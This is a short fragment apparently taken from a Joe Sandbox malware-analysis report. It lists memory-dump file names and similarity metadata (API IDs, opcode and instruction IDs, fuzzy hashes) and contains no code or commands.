                                                                        • Associated: 00000000.00000002.1849865833.0000000000EDF000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849892662.0000000000EE1000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a50000_888.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID:
                                                                        • API String ID: 3702945584-0
                                                                        • Opcode ID: 3fe4d4439c4874b19c360dd1f9bfe080399ac22efcb1b3ab600fbc20afba8082
                                                                        • Instruction ID: cd83ec81b5bcd8422d1c3bc69fe4c2ec38f2fff66c9f297f9a390c84f7f5160d
                                                                        • Opcode Fuzzy Hash: 3fe4d4439c4874b19c360dd1f9bfe080399ac22efcb1b3ab600fbc20afba8082
                                                                        • Instruction Fuzzy Hash: C131C370501289EFDB20DF69E8497AA7BE8FF44310F15856AE915EB390D338DE40CBA1